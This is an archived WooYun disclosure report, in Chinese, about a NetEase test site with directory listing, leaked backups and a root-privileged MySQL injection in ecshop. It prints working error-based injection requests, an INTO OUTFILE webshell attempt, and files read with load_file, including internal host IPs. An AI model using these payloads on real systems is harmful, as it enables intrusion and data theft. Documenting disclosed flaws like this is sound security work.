乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 细节已通知厂商并且等待厂商处理中 2016-03-31: 厂商已经确认,细节仅向厂商公开 2016-04-10: 细节向核心白帽子及相关领域专家公开 2016-04-20: 细节向普通白帽子公开 2016-04-30: 细节向实习白帽子公开 2016-05-15: 细节向公众公开
网易某站点MySQL注入(root)和备份文件泄漏
目录浏览,备份文件(sql,zip)打包下载:
http://tx2-bk02-30013.i.nease.net/
logo目录下是ecshop,存在MySQL注射,root权限。
GET /logo/mobile/ HTTP/1.1User-Agent: test'+(select 1 from (select count(*),concat( floor(rand(0)*2), 0x5e5e5e, user(), 0x5e5e5e) x from information_schema.character_sets group by x)y)#Cookie: ECS_ID=06b1e3e2558cdd1cc6e4c2f7aeaf2980a0b17577; real_ipd=106.38.178.198Host: tx2-bk02-30013.i.nease.netConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
[error] => Duplicate entry '1^^^root@localhost^^^' for key 'group_key'
将logo.zip解压到我的Linux服务器,尝试找一个可写的目录,很遗憾,没找到((┬_┬)。。。),所以这里直接写webshell不成功:
GET /logo/mobile/ HTTP/1.1User-Agent: test' union select 1,2,3,4,5 into outfile '/var/www/html/bak/t.txt'#Cookie: ECS_ID=06b1e3e2558cdd1cc6e4c2f7aeaf2980a0b17577; real_ipd=106.38.178.198Host: tx2-bk02-30013.i.nease.netConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
available databases [4]:[*] information_schema[*] miqi2[*] mysql[*] performance_schema
系统是debian:
#Netease Mirrordeb http://apt.x.netease.com:8660/debian/ jessie main non-free contrib deb http://apt.x.netease.com:8660/debian/ jessie-updates main non-free contrib deb-src http://apt.x.netease.com:8660/debian/ jessie main non-free contrib deb-src http://apt.x.netease.com:8660/debian/ jessie-updates main non-free contrib deb http://apt.x.netease.com:8660/debian-security/ jessie/updates main non-free contrib deb-src http://apt.x.netease.com:8660/debian-security/ jessie/updates main non-free contrib
select load_file('/etc/hosts'): 127.0.0.1 localhost::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters# Following entries are specific to your environment123.58.190.48 h1-o123.58.190.49 h2-o123.58.190.50 r1-o10.120.190.48 h110.120.190.49 h210.120.190.50 r110.120.165.165 r210.120.164.144 r3
这么个测试站,建议还是不要绑到外网IP上了
危害等级:中
漏洞Rank:10
确认时间:2016-03-31 10:37
该站点属于测试站点,目前已经下线,感谢您对网易产品的关注。
暂无